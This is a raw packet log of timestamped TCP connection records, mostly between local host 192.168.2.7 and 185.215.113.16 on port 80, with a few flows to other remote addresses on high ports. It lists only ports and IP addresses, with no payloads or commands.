Aug 26, 2024 23:29:22.724572897 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.724581957 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.724586964 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.724592924 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.724618912 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.724646091 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.724646091 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.724658966 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.724670887 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.724682093 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.724699020 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.724725008 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.724726915 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.724736929 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.724764109 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.724786043 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.724793911 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.724800110 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.724814892 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.724828005 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.724833012 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.724841118 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.724864006 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.724878073 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.724894047 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.724905968 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.724916935 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.724920034 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.724945068 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.724972010 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.724976063 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.724987030 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.725023985 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.725053072 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.725064039 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.725105047 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.725116014 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.725127935 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.725137949 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.725150108 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.725159883 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.725162029 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.725179911 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.725208044 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.725373983 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.725418091 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.726128101 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.726142883 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.726152897 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.726165056 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.726175070 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.726177931 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.726191044 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.726197004 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.726227999 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.726259947 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.726272106 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.726310968 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.727323055 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.727334023 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.727349997 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.727363110 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.727374077 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.727375031 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.727390051 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.727400064 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.727401972 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.727422953 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.727463007 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.727510929 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.727523088 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.727533102 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.727544069 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.727554083 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.727566957 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.727576017 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.727587938 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.727596998 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.727598906 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.727610111 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.727616072 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.727629900 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.727650881 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.727684021 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.727694988 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.727705956 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.727719069 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.727730989 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.727766037 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.727782011 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.727797985 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.727809906 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.727818966 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.727839947 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.727849007 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.727858067 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.727858067 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.727889061 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.727919102 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.728060961 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.728072882 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.728140116 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.728140116 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.728144884 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.728157043 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.728167057 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.728178978 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.728195906 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.728224993 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.737193108 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.742288113 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.793065071 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:22.802875042 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.802890062 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.802906036 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.802923918 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.802933931 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.802946091 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.802949905 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.802957058 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.802968025 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.802998066 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.803029060 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.803042889 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.803055048 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.803066969 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.803078890 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.803092003 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.803096056 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.803124905 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.803162098 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.803227901 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.803283930 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.803411961 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.803504944 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.803512096 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.803523064 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.803534031 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.803544998 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.803556919 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.803558111 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.803567886 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.803580046 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.803586006 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.803603888 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.803618908 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.803687096 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.803699970 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.803709030 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.803720951 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.803730011 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.803733110 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.803745031 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.803746939 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.803755999 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.803771973 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.803775072 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.803786039 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.803790092 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.803796053 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.803808928 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.803821087 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.803827047 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.803841114 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.803855896 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.803881884 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.814929008 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.814943075 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.814954996 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.814970016 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.814994097 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.815030098 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.815037966 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.815047026 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.815058947 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.815068007 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.815079927 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.815088034 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.815089941 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.815121889 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.815130949 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.815143108 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.815148115 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.815159082 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.815176010 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.815185070 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.815211058 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.815310001 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.815320969 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.815330982 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.815340996 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.815368891 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.815381050 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.815390110 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.815395117 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.815402031 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.815416098 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.815416098 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.815428019 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.815433025 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.815468073 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.815480947 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.815496922 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.815500975 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.815510035 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.815521002 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.815531969 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.815541029 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.815543890 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.815574884 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.815586090 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.815603018 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.815656900 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.815660000 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.815670013 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.815680027 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.815696955 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.815701962 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.815721989 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.815727949 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.815733910 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.815745115 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.815754890 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.815773010 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.815804005 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.815941095 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.815953016 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.815963030 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.815989017 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.816016912 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.816046953 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.816057920 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.816066980 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.816077948 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.816097975 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.816123962 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.816766977 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.816777945 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.816787958 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.816812992 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.816836119 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.816848993 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.816849947 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.816859961 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.816870928 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.816881895 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.816881895 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.816911936 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.816920996 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.817965984 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.817985058 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.817995071 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.818027973 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.818048000 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.818051100 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.818058014 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.818068981 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.818080902 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.818095922 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.818114042 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.818140030 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.818197012 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.818207979 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.818218946 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.818228960 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.818240881 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.818243980 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.818255901 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.818270922 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.818286896 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.818299055 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.818344116 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.818351984 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.818363905 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.818393946 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.818413019 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.818432093 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.818444014 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.818454027 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.818464994 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.818480968 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.818485022 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.818511009 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.818521023 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.818521976 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.818633080 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.818689108 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.818715096 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.818727016 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.818737030 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.818747997 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.818764925 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.818779945 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.818795919 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.818804026 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.818809032 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.818819046 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.818841934 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.818861961 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.839576006 CEST	49728	29257	192.168.2.7	95.179.163.21
Aug 26, 2024 23:29:22.844974041 CEST	49728	29257	192.168.2.7	95.179.163.21
Aug 26, 2024 23:29:22.850681067 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:22.850929022 CEST	45580	49729	65.21.18.51	192.168.2.7
Aug 26, 2024 23:29:22.861649990 CEST	49729	45580	192.168.2.7	65.21.18.51
Aug 26, 2024 23:29:22.866972923 CEST	45580	49729	65.21.18.51	192.168.2.7
Aug 26, 2024 23:29:22.893452883 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.893465042 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.893476963 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.893512964 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.893516064 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.893522978 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.893533945 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.893547058 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.893556118 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.893558025 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.893590927 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.893618107 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.893646955 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.893659115 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.893691063 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.893769026 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.893779993 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.893793106 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.893804073 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.893811941 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.893816948 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.893827915 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.893843889 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.893883944 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.894022942 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.894036055 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.894076109 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.894107103 CEST	80	49734	185.215.113.16	192.168.2.7
